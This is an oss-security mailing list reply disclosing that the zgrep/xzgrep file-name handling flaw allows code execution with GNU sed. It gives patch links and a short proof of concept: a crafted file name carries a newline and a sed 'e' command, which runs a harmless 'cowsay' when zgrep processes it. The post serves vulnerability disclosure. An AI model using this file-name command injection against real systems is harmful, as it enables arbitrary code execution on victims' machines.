oss-sec mailing list archives
Re: zgrep, xzgrep: arbitrary-file-write vulnerability
From: Jakub Wilk <jwilk () jwilk net>
Date: Fri, 8 Apr 2022 10:23:29 +0200
* Jim Meyering <jim () meyering net>, 2022-04-07, 11:44:
All previous versions of gzip and xzutils are affected. xzutils released this patch today: https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch.sig gzip-1.12 was released today, with the fix: https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html https://ftp.gnu.org/gnu/gzip/gzip-1.12.tar.xz https://ftp.gnu.org/gnu/gzip/gzip-1.12.tar.xz.sig
As mentioned in the xz patch, if you have GNU sed, you get not just file write, but direct code execution.
PoC:
$ touch foo.gz
$ echo foo | gzip > "$(printf '|\n;e cowsay pwned\n#.gz')"
$ zgrep foo *.gz
_______
< pwned >
-------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
foo
--
Jakub Wilk
Current thread:
- zgrep, xzgrep: arbitrary-file-write vulnerability Jim Meyering (Apr 07)
- Re: zgrep, xzgrep: arbitrary-file-write vulnerability Jakub Wilk (Apr 08)
- Re: zgrep, xzgrep: arbitrary-file-write vulnerability Axel Beckert (Apr 08)
- Re: zgrep, xzgrep: arbitrary-file-write vulnerability Levente Polyak (Apr 08)
- Re: zgrep, xzgrep: arbitrary-file-write vulnerability Jakub Wilk (Apr 08)